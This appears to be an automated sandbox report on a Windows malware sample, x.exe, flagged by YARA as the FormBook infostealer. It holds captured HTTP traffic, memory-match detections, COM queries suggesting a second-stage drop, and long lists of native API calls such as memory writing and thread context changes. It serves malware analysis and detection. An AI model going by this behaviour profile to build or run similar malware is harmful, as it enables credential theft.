        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:03 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:06 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 34 36 0d 0a 3c 68 31 3e 52 65 6c 61 74 65 64 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 53 6f 72 72 79 2c 20 77 65 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 61 74 20 70 61 67 65 2e 3c 2f 70 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0
        Source: x.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49840 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345434E0 NtCreateMutant,LdrInitializeThunk,3_2_345434E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_34542D10
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_34542B90
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34544570 NtSuspendThread,3_2_34544570
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34544260 NtSetContextThread,3_2_34544260
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542C50 NtUnmapViewOfSection,3_2_34542C50
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542C10 NtOpenProcess,3_2_34542C10
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34543C30 NtOpenProcessToken,3_2_34543C30
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542C30 NtMapViewOfSection,3_2_34542C30
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542C20 NtSetInformationFile,3_2_34542C20
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542CD0 NtEnumerateKey,3_2_34542CD0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542CF0 NtDelayExecution,3_2_34542CF0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34543C90 NtOpenThread,3_2_34543C90
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542D50 NtWriteVirtualMemory,3_2_34542D50
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542DC0 NtAdjustPrivilegesToken,3_2_34542DC0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542DA0 NtReadVirtualMemory,3_2_34542DA0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542E50 NtCreateSection,3_2_34542E50
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542E00 NtQueueApcThread,3_2_34542E00
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542ED0 NtResumeThread,3_2_34542ED0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542EC0 NtQuerySection,3_2_34542EC0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542E80 NtCreateProcessEx,3_2_34542E80
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542EB0 NtProtectVirtualMemory,3_2_34542EB0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542F00 NtCreateFile,3_2_34542F00
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542F30 NtOpenDirectoryObject,3_2_34542F30
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542FB0 NtSetValueKey,3_2_34542FB0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345438D0 NtGetContextThread,3_2_345438D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345429D0 NtWaitForSingleObject,3_2_345429D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345429F0 NtReadFile,3_2_345429F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542A10 NtWriteFile,3_2_34542A10
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542AC0 NtEnumerateValueKey,3_2_34542AC0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542A80 NtClose,3_2_34542A80
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542AA0 NtQueryInformationFile,3_2_34542AA0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542B10 NtAllocateVirtualMemory,3_2_34542B10
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542B00 NtQueryValueKey,3_2_34542B00
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542B20 NtQueryInformationProcess,3_2_34542B20
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542BC0 NtQueryInformationToken,3_2_34542BC0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542BE0 NtQueryVirtualMemory,3_2_34542BE0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542B80 NtCreateKey,3_2_34542B80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03454260 NtSetContextThread,LdrInitializeThunk,5_2_03454260
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03454570 NtSuspendThread,LdrInitializeThunk,5_2_03454570
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034534E0 NtCreateMutant,LdrInitializeThunk,5_2_034534E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452B00 NtQueryValueKey,LdrInitializeThunk,5_2_03452B00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03452B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_03452BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452B80 NtCreateKey,LdrInitializeThunk,5_2_03452B80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03452B90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452A10 NtWriteFile,LdrInitializeThunk,5_2_03452A10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03452AC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452A80 NtClose,LdrInitializeThunk,5_2_03452A80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034529F0 NtReadFile,LdrInitializeThunk,5_2_034529F0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034538D0 NtGetContextThread,LdrInitializeThunk,5_2_034538D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452F00 NtCreateFile,LdrInitializeThunk,5_2_03452F00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452E50 NtCreateSection,LdrInitializeThunk,5_2_03452E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452E00 NtQueueApcThread,LdrInitializeThunk,5_2_03452E00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452ED0 NtResumeThread,LdrInitializeThunk,5_2_03452ED0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_03452D10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_03452DA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03452C50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452C30 NtMapViewOfSection,LdrInitializeThunk,5_2_03452C30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452CF0 NtDelayExecution,LdrInitializeThunk,5_2_03452CF0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452B20 NtQueryInformationProcess,5_2_03452B20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452BE0 NtQueryVirtualMemory,5_2_03452BE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452AA0 NtQueryInformationFile,5_2_03452AA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034529D0 NtWaitForSingleObject,5_2_034529D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452F30 NtOpenDirectoryObject,5_2_03452F30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452FB0 NtSetValueKey,5_2_03452FB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452EC0 NtQuerySection,5_2_03452EC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452E80 NtCreateProcessEx,5_2_03452E80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452EB0 NtProtectVirtualMemory,5_2_03452EB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452D50 NtWriteVirtualMemory,5_2_03452D50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452DC0 NtAdjustPrivilegesToken,5_2_03452DC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452C10 NtOpenProcess,5_2_03452C10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452C20 NtSetInformationFile,5_2_03452C20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03453C30 NtOpenProcessToken,5_2_03453C30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03452CD0 NtEnumerateKey,5_2_03452CD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03453C90 NtOpenThread,5_2_03453C90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A59200 NtCreateFile,5_2_00A59200
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A59370 NtReadFile,5_2_00A59370
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A59460 NtDeleteFile,5_2_00A59460
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A59500 NtClose,5_2_00A59500
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A59670 NtAllocateVirtualMemory,5_2_00A59670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333F36F NtReadVirtualMemory,5_2_0333F36F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_004034CE
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_73AD22882_2_73AD2288
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345104453_2_34510445
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DA5263_2_345DA526
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CF5C93_2_345CF5C9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C75C63_2_345C75C6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BD6463_2_345BD646
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345346703_2_34534670
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452C6003_2_3452C600
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD62C3_2_345AD62C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CA6C03_2_345CA6C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CF6F63_2_345CF6F6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450C6E03_2_3450C6E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345106803_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C67573_2_345C6757
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345127603_2_34512760
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451A7603_2_3451A760
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BE0763_2_345BE076
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451B0D03_2_3451B0D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C70F13_2_345C70F1
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345000A03_2_345000A0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3455717A3_2_3455717A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D010E3_2_345D010E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF1133_2_344FF113
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD1303_2_345AD130
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345151C03_2_345151C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B1E03_2_3452B1E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FD2EC3_2_344FD2EC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451E3103_2_3451E310
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CF3303_2_345CF330
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345013803_2_34501380
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BEC4C3_2_345BEC4C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34513C603_2_34513C60
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C6C693_2_345C6C69
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CEC603_2_345CEC60
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34500C123_2_34500C12
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451AC203_2_3451AC20
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34528CDF3_2_34528CDF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452FCE03_2_3452FCE0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DACEB3_2_345DACEB
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345A9C983_2_345A9C98
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C7D4C3_2_345C7D4C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510D693_2_34510D69
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450AD003_2_3450AD00
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CFD273_2_345CFD27
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34519DD03_2_34519DD0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AFDF43_2_345AFDF4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522DB03_2_34522DB0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530E503_2_34530E50
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345B0E6D3_2_345B0E6D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C9ED23_2_345C9ED2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34502EE83_2_34502EE8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34511EB23_2_34511EB2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C0EAD3_2_345C0EAD
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CFF633_2_345CFF63
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451CF003_2_3451CF00
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C1FC63_2_345C1FC6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34516FE03_2_34516FE0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CEFBF3_2_345CEFBF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345198703_2_34519870
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452B8703_2_3452B870
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F68683_2_344F6868
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CF8723_2_345CF872
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345138003_2_34513800
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345B08353_2_345B0835
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345128C03_2_345128C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C78F33_2_345C78F3
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345268823_2_34526882
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450E9A03_2_3450E9A0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CE9A63_2_345CE9A6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CEA5B3_2_345CEA5B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CCA133_2_345CCA13
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CFA893_2_345CFA89
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452FAA03_2_3452FAA0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510B103_2_34510B10
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CFB2E3_2_345CFB2E
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34584BC03_2_34584BC0
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_03585A8D4_2_03585A8D
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_03587A5D4_2_03587A5D
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_03585ADD4_2_03585ADD
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0358E19D4_2_0358E19D
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_035878394_2_03587839
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0358783D4_2_0358783D
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0358FFBD4_2_0358FFBD
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_035A665D4_2_035A665D
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_0357BC4F4_2_0357BC4F
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeCode function: 4_2_03585CB54_2_03585CB5
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342E3105_2_0342E310
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DF3305_2_034DF330
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034113805_2_03411380
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033E22455_2_033E2245
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0340D2EC5_2_0340D2EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0346717A5_2_0346717A
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034E010E5_2_034E010E
